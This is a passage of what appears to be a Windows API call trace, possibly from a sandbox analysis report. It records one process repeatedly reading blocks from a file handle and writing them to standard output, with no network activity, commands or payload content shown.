nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] GetFileType (hFile=0x50) returned 0x1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] GetFileType (hFile=0x50) returned 0x1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] GetFileType (hFile=0x50) returned 0x1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] GetFileType (hFile=0x50) returned 0x1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] GetFileType (hFile=0x50) returned 0x1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] GetFileType (hFile=0x50) returned 0x1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.948] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.948] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.948] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.948] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] GetFileType (hFile=0x50) returned 0x1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] GetFileType (hFile=0x50) returned 0x1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] GetFileType (hFile=0x50) returned 0x1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] GetFileType (hFile=0x50) returned 0x1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] GetFileType (hFile=0x50) returned 0x1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] GetFileType (hFile=0x50) returned 0x1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] GetFileType (hFile=0x50) returned 0x1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] GetFileType (hFile=0x50) returned 0x1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.949] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.949] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.949] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.949] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] GetFileType (hFile=0x50) returned 0x1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] GetFileType (hFile=0x50) returned 0x1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] GetFileType (hFile=0x50) returned 0x1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] GetFileType (hFile=0x50) returned 0x1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] GetFileType (hFile=0x50) returned 0x1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] GetFileType (hFile=0x50) returned 0x1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] GetFileType (hFile=0x50) returned 0x1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] GetFileType (hFile=0x50) returned 0x1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.950] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.950] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.950] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.950] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] GetFileType (hFile=0x50) returned 0x1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] GetFileType (hFile=0x50) returned 0x1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] GetFileType (hFile=0x50) returned 0x1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] GetFileType (hFile=0x50) returned 0x1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] GetFileType (hFile=0x50) returned 0x1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] GetFileType (hFile=0x50) returned 0x1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] GetFileType (hFile=0x50) returned 0x1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] GetFileType (hFile=0x50) returned 0x1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.951] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.951] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.951] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.951] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] GetFileType (hFile=0x50) returned 0x1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] GetFileType (hFile=0x50) returned 0x1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] GetFileType (hFile=0x50) returned 0x1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] GetFileType (hFile=0x50) returned 0x1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] GetFileType (hFile=0x50) returned 0x1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] GetFileType (hFile=0x50) returned 0x1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] GetFileType (hFile=0x50) returned 0x1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] GetFileType (hFile=0x50) returned 0x1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.952] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.952] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.952] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.952] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] GetFileType (hFile=0x50) returned 0x1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] GetFileType (hFile=0x50) returned 0x1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] GetFileType (hFile=0x50) returned 0x1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] GetFileType (hFile=0x50) returned 0x1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] GetFileType (hFile=0x50) returned 0x1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] GetFileType (hFile=0x50) returned 0x1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] GetFileType (hFile=0x50) returned 0x1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] GetFileType (hFile=0x50) returned 0x1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.953] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.953] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.953] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.953] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] GetFileType (hFile=0x50) returned 0x1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] GetFileType (hFile=0x50) returned 0x1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] GetFileType (hFile=0x50) returned 0x1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] GetFileType (hFile=0x50) returned 0x1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] GetFileType (hFile=0x50) returned 0x1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] GetFileType (hFile=0x50) returned 0x1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] GetFileType (hFile=0x50) returned 0x1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] GetFileType (hFile=0x50) returned 0x1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.954] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.954] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.954] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.954] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] GetFileType (hFile=0x50) returned 0x1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] GetFileType (hFile=0x50) returned 0x1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] GetFileType (hFile=0x50) returned 0x1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] GetFileType (hFile=0x50) returned 0x1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] GetFileType (hFile=0x50) returned 0x1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, 